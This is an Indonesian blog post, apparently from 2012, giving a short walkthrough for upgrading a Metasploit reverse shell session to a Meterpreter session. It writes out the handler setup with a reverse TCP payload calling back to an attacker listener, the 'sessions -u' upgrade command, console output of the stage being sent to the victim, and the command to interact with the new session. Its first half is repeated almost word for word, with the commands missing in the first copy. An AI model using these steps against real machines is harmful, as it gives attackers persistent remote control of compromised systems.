Meterpreter mungkin adalah bagian yang paling didambakan bagi para exploiter. Tidak hanya memiliki modul yang lengkap untuk memudahkan aksi eksploitasi, namun juga memiliki jalur koneksi yang secure sehingga nyaris tidak meninggalkan jejak paket dalam sebuah koneksi. Beberapa kasus yang sering ditemukan adalah, ketika exploiter menemukan sebuah kondisi dimana besar buffer tidak cukup untuk membuat system tereksploit sehingga shell code meterpreter tidak dapat di-inject kedalam paket. Pilihan terakhir yang diambil adalah dengan menggunakan payload shell yang memiliki ikuran buffer yang lebih kecil.
Dengan payload ini, attacker dapat membuka sesi shell. Sayang sekali jika kita tidak dapat membuat sesi meterpreter. Namun tenang dulu, kita masih bisa melakukan upgrade sesi kita menjadi sesi meterpreter.
Dalam kasus ini, saya menggunakan exploit/multi/handler dengan payload windows/shell_reverse_tcp, IP address saya 10.10.1.1 dan melakukan listening pada port 4444.
Sesaat kemudian, shell sesi pertama terbuka.
Bagaimana cara membuat sesi ini menjadi meterpreter?
Cukup masukan perintah berikut
Maka akan muncul seperti ini.
Kemudian cek ID sesi meterpreter dengan perintah
Terlihat bahwa ID sesi meterpreter adalah 3. Selanjutnya kita akses meterpreter dengan perintah.
You are so.....
Pwned by : red-dragon
Dengan payload ini, attacker dapat membuka sesi shell. Sayang sekali jika kita tidak dapat membuat sesi meterpreter. Namun tenang dulu, kita masih bisa melakukan upgrade sesi kita menjadi sesi meterpreter.
Dalam kasus ini, saya menggunakan exploit/multi/handler dengan payload windows/shell_reverse_tcp, IP address saya 10.10.1.1 dan melakukan listening pada port 4444.
Sesaat kemudian, shell sesi pertama terbuka.
Bagaimana cara membuat sesi ini menjadi meterpreter?
Cukup masukan perintah berikut
Command :
msf exploit(handler) > sessions -u 2 -q
Maka akan muncul seperti ini.
Command :
msf exploit(handler) > sessions -u 2 -q
[*] Started reverse handler on 10.10.1.1:4444
[*] Starting the payload handler...
[*] Command Stager progress - 1.66% done (1699/102108 bytes)
...
<snip>
...
[*] Sending stage (752128 bytes) to 10.10.1.128
[*] Command Stager progress - 100.00% done (102108/102108 bytes)
msf exploit(handler) > [*] Meterpreter session 3 opened (10.10.1.1:4444 -> 10.10.1.128:1048) at 2012-06-08 10:56:08 +0700
Kemudian cek ID sesi meterpreter dengan perintah
Command :
msf exploit(handler) > sessions -l -v
Terlihat bahwa ID sesi meterpreter adalah 3. Selanjutnya kita akses meterpreter dengan perintah.
Command :
msf exploit(handler) > sessions -i 3
[*] Starting interaction with 3...
meterpreter >
You are so.....
Pwned by : red-dragon
Post a Comment